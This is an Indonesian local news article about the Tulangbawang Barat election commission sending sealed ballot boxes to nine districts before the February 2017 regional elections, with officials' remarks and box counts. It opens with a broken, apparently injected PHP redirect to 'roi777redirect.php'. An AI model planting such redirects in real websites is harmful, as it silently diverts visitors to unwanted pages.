header( 'Location: /roi777redirect.php true, 303 );header( 'Location: roi777redirect.php', true, 303 ); Logistik Pemilukada Di Kawal Ketat Sampai Ke 9 Kecamatan -
Logistik Pemilukada Di Kawal Ketat Sampai Ke 9 Kecamatan

TRANSLAMPUNG.COM, PANARAGAN-Tiga menjelang Pemilihan Umum Kepala Daerah (Pemilukada), yang di laksanakan secara serentak ?pada 15 Februari 2017 mendatang. Komisi Pemilihan Umum Daerah (KPUD) Tulangbawang Barat (Tubaba), melakukan Pendistribusian Logistik Surat Suara ke PPK Kecamatan Se-Kabupaten.

Hal tersebut, merupakan salah satu tahapan tahapan dalam penyelenggaraan Pemilukada yang akan di laksanakan secara serentak pada15 Februari mendatang oleh Komisi Pemilihan Umum Daerah (KPUD) Tulangbawang Barat (Tubaba).

Menurut Penjabat Bupati Adeham, dalam sambutan nya dia mengatakan bahwa rangkaian kegiatan ini adalah salah satu bentuk ikhtiar seluruh elemen guna mensukses kan Pemilukada pada 15 Februari mendatang.

“Tentu nya, rangkaian kegiatan ini merupakan manifestasi dari adanya kemitraan yang telah terjalin selama ini antara Pemerintah Daerah, Legislatif, KPUD, serta seluruh elemen masyarakat di Lingkup Kabupaten Tubaba ini,” katanya dalam sambutan nya di Gudang Logistik KPUD Tubaba, Minggu 12/2 Kemarin.

Lanjutnya, Adeham mengatakan bahwa dengan harapan Pemilukada 15 Februari mendatang dapat berjalan dengan aman, tertib, dan lancar, serta kondusif.

“Saya sangat berharap agar Pendistribusian Logistik Pemilukada ini dapat berjalan dengan lancar, dan sesuai dengan kebutuhan untuk masing-masing TPS di seluruh Kecamatan di Kabupaten Tulangbawang Barat (Tubaba)?, dengan harapan Pemilukada ini dapat berjalan dengan sesuai yang kita harapkan?,” imbuhnya.

Di tempat yang sama, Ahmad Ismanto Ketua KPUD Tubaba mengatakan, Pendistribusian Logistik Surat Suara ini juga, menjadi salah satu tahapan tahapan yang di laksanakan oleh pihak nya. Guna, mensukses kan Pemilukada yang dilaksanakan secara serentak pada 15 Februari 2017 mendatang.

?”Adapun dalam rangkaian Pendistribusian Logistik Pemilukda ini adalah. Berupa Kotak Suara, dan surat suara yang akan di distribusikan secara teknis kepada  Panitia Pengawas Kecamatan (PPK) Masing masing yang ada di 9 kecamatan Se-Kabupaten Tubaba,” ungkapnya.

Sementara, data Pendistribusian Logistik yang di kirim ke 9 kecamatan Se-Kabupaten Tubaba adalah

Tulangbawang Udik sebanyak 9 tiyuh, 60 TPS/Kotak Suara + 65
2. Lambu Kibang 10 Tiyuh, 46 / TPS Kotak Suara + 54
3. Way Kenanga 9 tiyuh, 42/ TPS Kotak Suara + 50
4. Tumijajar 10 Tiyuh, 75 /TPS Kotak Suara + 83
5. Tulangbawang Tengah 19 Tiyuh, 174/ TPS Kotak Suara + 182
6. Batu Putih 10 Tiyuh, 36 /TPS Kotak Suara + 44
7. Pagar Dewa 6 Tiyuh, 12 TPS kotak Suara + 20
8. Gunung Agung 13 Tiyuh, 66 TPS /Kotak Suara + 74
9. Gunung Terang 10 Tiyuh, 42 TPS / Kotak Suara + 50
Jumlah Kotak suara 553 / TPS + 27 kotak Suara/per Kecamatan Jumlah Keseluruhan 580 Kotak Suara.
Masing masing Logistik yang di kirim tersebut dalam keadaan tersegel, dan dalam pengaman pihak TNI, dan Polri sampai tiba di Kecamatan Masing masing?.(Dery)

News Reporter